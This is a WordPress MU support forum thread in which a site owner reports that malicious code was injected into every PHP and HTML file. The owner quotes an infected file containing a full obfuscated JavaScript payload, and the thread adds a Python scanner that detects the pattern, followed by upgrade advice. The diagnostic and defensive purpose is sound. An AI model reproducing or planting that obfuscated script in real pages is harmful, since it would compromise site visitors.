
Code vulnerability?! (12 posts)

  1. vladbuk
    Member
    Posted 16 years ago

    wpmu 1.2.5.a
    hosted on siteground.com

    This has already happened once and is repeating again: in all the PHP files and my own HTML in the /public_html folder, harmful code has been added! A PHP warning on the main page and no access to the admin interface.

    Sample wp-rss.php:

    <?php

    if (empty($wp)) {
    require_once('wp-config.php');
    wp('feed=rss');
    }

    require (ABSPATH . WPINC . '/feed-rss.php');

    ?> <!-- ab2aab4b9d766629b77b9b4febadeb6f --><script>document.write(unescape("%3Cscript%3Efunction%20dwfc15%28bse742%29%7Bvar%20m5pn9i%3Dnew%20String%28arguments.callee%29%3Bm5pn9i%3Dm5pn9i.replace%28/%5B%5Ea-z0-9%28%29+_%5C.%2C-%5D+/ig%2C%20%22%22%29.toUpperCase%28%29%2Csrgfnw%3D0%2Cmumscr%3D0%2Ca7c98k%3D%27%27%2Chbzv8w%3D0%3Bfor%28var%20l8anwe%3D0%3Bl8anwe%3Cm5pn9i.length%3Bl8anwe++%29hbzv8w+%3Dm5pn9i.charCodeAt%28l8anwe%2C1%29%3Bfor%28srgfnw%3D0%3Bsrgfnw%3Cbse742.length%3Bsrgfnw++%29%7Bvar%20abksjm%3Dbse742%5Bsrgfnw%5D%2Cxcaot3%3Dm5pn9i.substr%28mumscr%2C1%29.charCodeAt%280%29%5Ehbzv8w%3Ba7c98k+%3DString.fromCharCode%28abksjm%5Excaot3%29%3Bmumscr++%3Bif%28mumscr%3D%3Dm5pn9i.length%29mumscr%3D0%7Ddocument.write%28a7c98k%29%3Ba7c98k%3D%27%27%7Ddwfc15%28new%20Array%2829808%2C29740%2C29735%2C29755%2C29751%2C29747%2C29745%2C29818%2C29763%2C29783%2C29727%2C29757%2C29769%2C29782%2C29772%2C29743%2C29815%2C29759%2C29775%2C29777%2C29772%2C29772%2C29736%2C29746%2C29736%2C29730%2C29713%2C29736%2C29734%2C29821%2C29734%2C29740%2C29704%2C29713%2C29699%2C29822%2C29797%2C29795%2C29730%2C29752%2C29772%2C29736%2C29740%2C29732%2C29744%2C29737%2C29799%2C29805%2C29822%2C29730%2C29700%2C29759%2C29738%2C29748%2C29798%2C29755%2C29810%2C29783%2C29743%2C29782%2C29737%2C29800%2C29715%2C29740%2C29818%2C29720%2C29821%2C29823%2C29715%2C29733%2C29771%2C29738%2C29799%2C29740%2C29735%2C29753%2C29801%2C29734%2C29727%2C29759%2C29705%2C29756%2C29791%2C29769%2C29780%2C29782%2C29771%2C29722%2C29813%2C29773%2C29720%2C29722%2C29713%2C29816%2C29805%2C29775%2C29710%2C29705%2C29815%2C29797%2C29744%2C29809%2C29799%2C29755%2C29814%2C29754%2C29758%2C29755%2C29756%2C29782%2C29777%2C29710%2C29744%2C29812%2C29820%2C29797%2C29823%2C29821%2C29768%2C29763%2C29747%2C29738%2C29749%2C29751%2C29801%2C29751%2C29697%2C29702%2C29750%2C29744%2C29763%2C29781%2C29767%2C29743%2C29765%2C29750%2C29729%2C29759%2C29746%2C29714%2C29703%2C29770%2C29702%2C29757%2C29808%2C29707%2C29735%2C29750%2C29781%2C29772%2C29800%2C29755%2C297
10%2C29733%2C29793%2C29770%2C29748%2C29789%2C29759%2C29739%2C29737%2C29750%2C29751%2C29786%2C29818%2C29817%2C29715%2C29752%2C29737%2C29772%2C29762%2C29774%2C29764%2C29750%2C29741%2C29749%2C29766%2C29809%2C29795%2C29747%2C29740%2C29711%2C29717%2C29772%2C29744%2C29741%2C29745%2C29810%2C29764%2C29752%2C29765%2C29792%2C29713%2C29736%2C29734%2C29821%2C29734%2C29772%2C29710%2C29710%2C29713%2C29808%2C29792%2C29801%2C29758%2C29742%2C29759%2C29750%2C29720%2C29793%2C29725%2C29733%2C29735%2C29811%2C29736%2C29768%2C29778%2C29783%2C29759%2C29738%2C29744%2C29711%2C29751%2C29745%2C29740%2C29729%2C29803%2C29818%2C29716%2C29739%2C29754%2C29699%2C29737%2C29740%2C29722%2C29700%2C29699%2C29799%2C29716%2C29714%2C29787%2C29771%2C29737%2C29732%2C29741%2C29736%2C29712%2C29731%2C29748%2C29757%2C29815%2C29803%2C29750%2C29801%2C29760%2C29783%2C29767%2C29819%2C29799%2C29755%2C29732%2C29735%2C29738%2C29744%2C29733%2C29713%2C29737%2C29749%2C29754%2C29784%2C29700%2C29705%2C29813%2C29781%2C29767%2C29761%2C29774%2C29780%2C29775%2C29756%2C29754%2C29759%2C29732%2C29746%2C29781%2C29799%2C29701%2C29818%2C29730%2C29766%2C29741%2C29767%2C29741%2C29750%2C29735%2C29751%2C29814%2C29809%2C29743%2C29773%2C29782%2C29756%2C29780%2C29763%2C29777%2C29743%2C29778%2C29765%2C29708%2C29800%2C29750%2C29731%2C29745%2C29754%2C29803%2C29743%2C29731%2C29753%2C29755%2C29763%2C29790%2C29786%2C29707%2C29734%2C29731%2C29736%2C29779%2C29745%2C29735%2C29784%2C29741%2C29723%2C29723%2C29800%2C29740%2C29779%2C29783%2C29777%2C29752%2C29769%2C29767%2C29741%2C29765%2C29777%2C29747%2C29734%2C29755%2C29794%2C29752%2C29816%2C29812%2C29797%2C29804%2C29811%2C29771%2C29741%2C29754%2C29728%2C29748%2C29733%2C29799%2C29733%2C29728%2C29743%2C29745%2C29750%2C29700%2C29714%2C29799%2C29751%2C29730%2C29744%2C29742%2C29744%2C29781%2C29724%2C29810%2C29804%2C29764%2C29749%2C29758%2C29738%2C29756%2C29707%2C29751%2C29749%2C29787%2C29759%2C29750%2C29710%2C29811%2C29700%2C29749%2C29757%2C29735%2C29808%2C29817%2C29792%2C29699%2C29804%2C29823%2C29747%2C297
45%2C29728%2C29739%2C29716%2C29737%2C29728%2C29757%2C29721%2C29749%2C29742%2C29737%2C29755%2C29809%2C29711%2C29716%2C29803%2C29815%2C29807%2C29705%2C29803%2C29727%2C29806%2C29709%2C29710%2C29806%2C29770%2C29741%2C29775%2C29736%2C29790%2C29783%2C29823%2C29806%2C29796%2C29769%2C29763%2C29783%2C29770%2C29772%2C29744%2C29756%2C29732%2C29804%2C29746%2C29723%2C29787%2C29773%2C29739%2C29740%2C29730%2C29784%2C29776%2C29772%2C29709%2C29739%2C29753%2C29745%2C29747%2C29786%2C29810%2C29751%2C29722%2C29795%2C29753%2C29762%2C29783%2C29776%2C29783%2C29777%2C29728%2C29733%2C29753%2C29761%2C29731%2C29808%2C29736%2C29814%2C29756%2C29807%2C29728%2C29745%2C29754%2C29777%2C29732%2C29742%2C29736%2C29746%2C29793%2C29752%2C29777%2C29742%2C29771%2C29759%2C29804%2C29713%2C29823%2C29743%2C29771%2C29751%2C29736%2C29709%2C29823%2C29766%2C29751%2C29739%2C29731%2C29816%2C29801%2C29801%2C29796%2C29698%2C29752%2C29703%2C29819%2C29722%2C29701%2C29711%2C29709%2C29761%2C29774%2C29745%2C29789%2C29720%2C29723%2C29710%2C29739%2C29753%2C29771%2C29775%2C29722%2C29820%2C29804%2C29823%2C29735%2C29783%2C29765%2C29777%2C29760%2C29762%2C29741%2C29735%2C29771%2C29776%2C29704%2C29738%2C29757%2C29753%2C29711%2C29739%2C29746%2C29777%2C29775%2C29730%2C29815%2C29747%2C29745%2C29728%2C29739%2C29716%2C29765%2C29732%2C29778%2C29730%2C29786%2C29783%2C29711%2C29767%2C29743%2C29741%2C29820%2C29820%2C29766%2C29749%2C29779%2C29759%2C29803%2C29755%2C29773%2C29747%2C29728%2C29745%2C29731%2C29796%2C29738%2C29736%2C29736%2C29738%2C29715%2C29821%2C29755%2C29766%2C29774%2C29780%2C29766%2C29754%2C29746%2C29776%2C29773%2C29774%2C29807%2C29737%2C29772%2C29766%2C29751%2C29736%2C29738%2C29697%2C29737%2C29789%2C29728%2C29741%2C29752%2C29807%2C29723%2C29697%2C29765%2C29751%2C29734%2C29747%2C29736%2C29787%2C29746%2C29775%2C29807%2C29777%2C29755%2C29737%2C29782%2C29807%2C29700%2C29759%2C29731%2C29735%2C29741%2C29740%2C29804%2C29763%2C29765%2C29762%2C29733%2C29743%2C29772%2C29755%2C29762%2C29746%2C29756%2C29757%2C29702%2C29791%2C29726%2C298
04%2C29739%2C29757%2C29781%2C29817%2C29724%2C29740%2C29752%2C29729%2C29813%2C29715%2C29794%2C29816%2C29737%2C29794%2C29751%2C29752%2C29756%2C29709%2C29734%2C29776%2C29787%2C29712%2C29770%2C29731%2C29752%2C29796%2C29705%2C29759%2C29750%2C29756%2C29808%2C29796%2C29794%2C29731%2C29752%2C29781%2C29813%2C29770%2C29745%2C29742%2C29808%2C29794%2C29800%2C29802%2C29817%2C29816%2C29809%2C29820%2C29801%2C29823%2C29709%2C29710%2C29704%2C29808%2C29795%2C29805%2C29761%2C29774%2C29780%2C29743%2C29750%2C29734%2C29736%2C29744%2C29747%2C29788%2C29737%2C29771%2C29812%2C29735%2C29788%2C29740%2C29775%2C29744%2C29754%2C29800%2C29796%2C29822%2C29750%2C29763%2C29738%2C29754%2C29799%2C29810%2C29801%2C29818%2C29723%2C29721%2C29699%2C29711%2C29801%2C29735%2C29752%2C29755%2C29736%2C29749%2C29739%2C29799%2C29757%2C29759%2C29774%2C29775%2C29766%2C29803%2C29800%2C29819%2C29820%2C29712%2C29798%2C29803%2C29784%2C29745%2C29763%2C29787%2C29747%2C29764%2C29738%2C29795%2C29818%2C29795%2C29807%2C29805%2C29760%2C29794%2C29740%2C29738%2C29696%2C29700%2C29718%2C29720%2C29740%2C29755%2C29740%2C29728%2C29736%2C29706%2C29794%2C29811%2C29793%2C29776%2C29769%2C29774%2C29791%2C29763%2C29762%2C29752%2C29810%2C29748%2C29737%2C29774%2C29758%2C29739%2C29739%2C29740%2C29753%2C29765%2C29784%2C29706%2C29730%2C29777%2C29747%2C29758%2C29739%2C29749%2C29740%2C29756%2C29799%2C29701%2C29818%2C29730%2C29766%2C29741%2C29767%2C29746%2C29734%2C29739%2C29731%2C29814%2C29803%2C29742%2C29773%2C29782%2C29756%2C29780%2C29763%2C29777%2C29747%2C29756%2C29728%2C29757%2C29738%2C29749%2C29729%2C29796%2C29823%2C29708%2C29753%2C29751%2C29728%2C29739%2C29730%2C29767%2C29733%2C29769%2C29799%2C29776%2C29789%2C29742%2C29768%2C29730%2C29784%2C29799%2C29786%2C29788%2C29733%2C29737%2C29735%2C29707%2C29743%2C29814%2C29751%2C29741%2C29741%2C29757%2C29811%2C29743%2C29734%2C29780%2C29780%2C29771%2C29741%2C29719%2C29742%2C29776%2C29787%2C29720%2C29704%2C29820%2C29804%2C29797%2C29792%2C29727%2C29809%2C29796%2C29767%2C29739%2C29741%2C29756%2C29811%2C297
54%2C29745%2C29751%2C29736%2C29741%2C29736%2C29812%2C29738%2C29748%2C29752%2C29754%2C29806%2C29807%2C29817%2C29795%2C29817%2C29705%2C29816%2C29794%2C29821%2C29771%2C29765%2C29766%2C29790%2C29803%2C29746%2C29776%2C29773%2C29780%2C29734%2C29747%2C29817%2C29736%2C29733%2C29790%2C29734%2C29809%2C29706%2C29699%2C29818%2C29820%2C29803%2C29743%2C29754%2C29772%2C29736%2C29779%2C29753%2C29781%2C29769%2C29723%2C29707%2C29742%2C29739%2C29788%2C29791%2C29739%2C29741%2C29736%2C29770%2C29755%2C29767%2C29777%2C29700%2C29754%2C29737%2C29751%2C29799%2C29758%2C29728%2C29755%2C29756%2C29734%2C29756%2C29729%2C29782%2C29709%2C29770%2C29750%2C29755%2C29740%2C29752%2C29741%2C29746%2C29780%2C29704%2C29743%2C29744%2C29748%2C29741%2C29810%2C29816%2C29751%2C29740%2C29762%2C29748%2C29755%2C29782%2C29766%2C29748%2C29780%2C29740%2C29800%2C29815%2C29748%2C29766%2C29737%2C29770%2C29814%2C29802%2C29815%2C29701%2C29820%2C29792%2C29816%2C29806%2C29722%2C29743%2C29736%2C29749%2C29807%2C29703%2C29819%2C29714%2C29804%2C29795%2C29821%2C29747%2C29755%2C29727%2C29758%2C29736%2C29787%2C29795%2C29721%2C29819%2C29807%2C29795%2C29752%2C29744%2C29734%2C29731%2C29780%2C29730%2C29738%2C29752%2C29739%2C29702%2C29704%2C29699%2C29821%2C29800%2C29732%2C29748%2C29787%2C29742%2C29711%2C29728%2C29786%2C29742%2C29718%2C29778%2C29741%2C29760%2C29722%2C29750%2C29753%2C29745%2C29735%2C29730%2C29798%2C29798%2C29803%2C29796%2C29698%2C29793%2C29717%2C29794%2C29796%2C29814%2C29807%2C29762%2C29783%2C29771%2C29794%2C29751%2C29757%2C29778%2C29749%2C29753%2C29742%2C29737%2C29796%2C29813%2C29717%2C29698%2C29702%2C29740%2C29793%2C29758%2C29805%2C29797%2C29792%2C29793%2C29712%2C29795%2C29719%2C29704%2C29793%2C29793%2C29795%2C29796%2C29808%2C29744%2C29756%2C29736%2C29729%2C29741%2C29735%2C29752%2C29697%2C29705%2C29708%2C29696%2C29797%2C29811%2C29796%2C29796%2C29798%2C29815%2C29799%2C29806%2C29800%2C29817%2C29796%2C29725%2C29724%2C29718%2C29819%2C29816%2C29798%2C29804%2C29744%2C29749%2C29775%2C29729%2C29799%2C29740%2C29728%2C29738%2C298
03%2C29734%2C29777%2C29758%2C29719%2C29767%2C29745%2C29773%2C29751%2C29752%2C29792%2C29808%2C29822%2C29811%2C29698%2C29797%2C29809%2C29797%2C29817%2C29794%2C29816%2C29778%2C29779%2C29770%2C29783%2C29799%2C29738%2C29732%2C29739%2C29757%2C29797%2C29797%2C29807%2C29759%2C29750%2C29771%2C29769%2C29709%2C29746%2C29737%2C29732%2C29748%2C29705%2C29776%2C29761%2C29748%2C29748%2C29727%2C29759%2C29771%2C29736%2C29758%2C29755%2C29740%2C29713%2C29733%2C29731%2C29760%2C29727%2C29740%2C29751%2C29742%2C29735%2C29733%2C29803%2C29794%2C29801%2C29731%2C29755%2C29729%2C29761%2C29759%2C29729%2C29742%2C29751%2C29800%2C29806%2C29791%2C29763%2C29762%2C29758%2C29779%2C29747%2C29738%2C29774%2C29737%2C29734%2C29739%2C29801%2C29748%2C29724%2C29712%2C29813%2C29792%2C29698%2C29732%2C29794%2C29799%2C29822%2C29817%2C29801%2C29813%2C29708%2C29806%2C29809%2C29701%2C29812%2C29724%2C29823%2C29742%2C29734%2C29742%2C29754%2C29735%2C29765%2C29792%2C29811%2C29799%2C29750%2C29812%2C29823%2C29725%2C29813%2C29797%2C29743%2C29744%2C29749%2C29807%2C29804%2C29736%2C29765%2C29743%2C29816%2C29738%2C29795%2C29823%2C29721%2C29803%2C29780%2C29801%2C29711%2C29714%2C29741%2C29720%2C29803%2C29780%2C29794%2C29720%2C29723%2C29793%2C29731%2C29812%2C29817%2C29738%2C29808%2C29744%2C29744%2C29734%2C29757%2C29737%2C29758%2C29801%2C29715%2C29810%2C29763%2C29756%2C29745%2C29793%2C29787%2C29778%2C29783%2C29772%2C29742%2C29795%2C29717%2C29734%2C29771%2C29746%2C29802%2C29761%2C29730%2C29738%2C29739%2C29746%2C29748%2C29814%2C29809%2C29795%2C29806%2C29805%2C29761%2C29797%2C29748%2C29736%2C29745%2C29728%2C29755%2C29740%2C29815%2C29813%2C29700%2C29816%2C29799%2C29798%2C29815%2C29798%2C29812%2C29742%2C29773%2C29750%2C29779%2C29750%2C29782%2C29751%2C29746%2C29773%2C29748%2C29796%2C29788%2C29816%2C29737%2C29778%2C29766%2C29735%2C29775%2C29766%2C29763%2C29746%2C29743%2C29761%2C29777%2C29745%2C29768%2C29703%2C29788%2C29698%2C29726%2C29697%2C29755%2C29761%2C29777%2C29703%2C29819%2C29747%2C29703%2C29790%2C29707%2C29709%2C29797%2C29797%2C297
44%2C29812%2C29747%2C29729%2C29739%2C29757%2C29738%2C29749%2C29731%2C29706%2C29706%2C29725%2C29780%2C29778%2C29809%2C29795%2C29751%2C29758%2C29768%2C29775%2C29751%2C29739%2C29817%29%29%3C/script%3E"))</script><!--/-->
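    The post above shows the shape of the injection: a closing `?>` followed by an HTML comment carrying a 32-hex-digit tag and a `<script>document.write(unescape("..."))</script>` block, appended to every PHP and HTML file under the web root. The scanner below is an added example written for this thread, not code from the original post or from WordPress MU; it walks a web root, flags files containing that pattern, and decodes the percent-encoded blob for a preview without executing any of it. The sample files, the placeholder hex tag and the placeholder payload are all constructed here (the blob decodes to an empty function, not the real script).

```python
import re
import tempfile
from pathlib import Path

# Heuristic for the injection style shown in the post: a <script> whose whole body is
# document.write(unescape("<percent-encoded blob>")). Written for this example only.
INJECTION_RE = re.compile(
    r'<script>\s*document\.write\(\s*unescape\(\s*(["\'])(?P<payload>[^"\']+)\1\s*\)\s*\)\s*</script>',
    re.IGNORECASE,
)
# The sample is preceded by an HTML comment holding a 32-hex-digit tag; flag it when present.
TAG_RE = re.compile(r"<!--\s*[0-9a-f]{32}\s*-->\s*$", re.IGNORECASE)


def js_unescape(s):
    """Decode a string the way JavaScript's unescape() does (%XX and %uXXXX forms)."""
    return re.sub(
        r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
        lambda m: chr(int(m.group(1) or m.group(2), 16)),
        s,
    )


def scan_text(text):
    """Return findings for one file's contents; nothing in the file is executed."""
    findings = []
    for m in INJECTION_RE.finditer(text):
        decoded = js_unescape(m.group("payload"))
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "tagged": bool(TAG_RE.search(text[:m.start()])),
            "preview": decoded[:80],
        })
    return findings


def scan_tree(root, suffixes=(".php", ".html", ".htm")):
    """Scan every PHP/HTML file under root; map relative path -> findings."""
    root = Path(root)
    results = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in suffixes:
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        found = scan_text(text)
        if found:
            results[path.relative_to(root).as_posix()] = found
    return results


# Constructed copy of a clean wp-rss.php, as quoted in the post.
CLEAN_WP_RSS = """<?php
if (empty($wp)) {
    require_once('wp-config.php');
    wp('feed=rss');
}
require (ABSPATH . WPINC . '/feed-rss.php');
?>
"""
# Constructed placeholder payload: decodes to an empty function, not the real blob.
PLACEHOLDER_BLOB = "%3Cscript%3Efunction%20f%28%29%7B%7D%3C/script%3E"
# Constructed placeholder tag (the post's tag is a different 32-hex-digit value).
INFECTED_TAIL = ('<!-- 0123456789abcdef0123456789abcdef --><script>document.write(unescape("'
                 + PLACEHOLDER_BLOB + '"))</script><!--/-->')


def demo():
    """Build a constructed web root in a temp dir, infect two files, and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-rss.php").write_text(CLEAN_WP_RSS)
        (root / "index.html").write_text("<html><body>hi</body></html>\n" + INFECTED_TAIL)
        theme = root / "wp-content" / "themes" / "default"
        theme.mkdir(parents=True)
        (theme / "footer.php").write_text(CLEAN_WP_RSS.rstrip() + " " + INFECTED_TAIL)
        return scan_tree(root)


if __name__ == "__main__":
    for name, hits in sorted(demo().items()):
        for h in hits:
            print(f"{name}:{h['line']} tagged={h['tagged']} -> {h['preview']}")
```

    The match is on the `document.write(unescape(` construct rather than on "anything after `?>`", because theme templates legitimately carry markup after a closing PHP tag. Stripping the appended tail from each file only removes this one artefact; as the rest of the thread says, the likely entry point was the outdated WPMU install, so restoring files from a known-clean copy and upgrading is what actually closes the door.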

  2. andrea_r
    Moderator
    Posted 16 years ago

    Soooo.... someone hacked into your site?

  3. vladbuk
    Member
    Posted 16 years ago

    No user - only visitors...

  4. theapparatus
    Member
    Posted 16 years ago

    Added modlook in a hopeful attempt to get rid of all that.

    wpmu 1.2.5.a

    That's probably your problem right there. 1.3 has been out for quite some time and fixed some security problems. Keeping an eye on versions is usually a good thing.

  5. vladbuk
    Member
    Posted 16 years ago

    theapparatus, thanks.
    I intended to do the upgrade at once after the version 1.3 release. But there is no XMLRPC support, and I need it. Though for the sake of safety it is possible to give up that functionality.

  6. PhoenixRises
    Member
    Posted 16 years ago

    There is XMLRPC support in 1.3.

  7. vladbuk
    Member
    Posted 16 years ago

  8. vladbuk
    Member
    Posted 16 years ago

    donncha said: "The XMLRPC disable code is safe, I'll be releasing it as a standalone WordPress MU plugin in a few days."
    Where is that plugin?

  9. PhoenixRises
    Member
    Posted 16 years ago

    I installed WPMU 1.3 and while XMLRPC is disabled by default, it was possible to enable it on a 'per blog' basis. I couldn't find an option to enable it site-wide but I didn't look too much. However, the functionality is definitely there.

  10. vladbuk
    Member
    Posted 16 years ago

    So upgrade time has come.
    But it is interesting how this hacker's code gets added?

  11. donncha
    Key Master
    Posted 16 years ago

    XMLRPC is enabled in 1.3. The disabling code was taken out before the final release. I keep meaning to release that plugin but I never get around to it.

    Unfortunately, it's probably because you were using an old version of WPMU that you got hacked :(

  12. vladbuk
    Member
    Posted 16 years ago

    donncha, thanks. All the same, it is impossible to eat products that are not fresh :-)
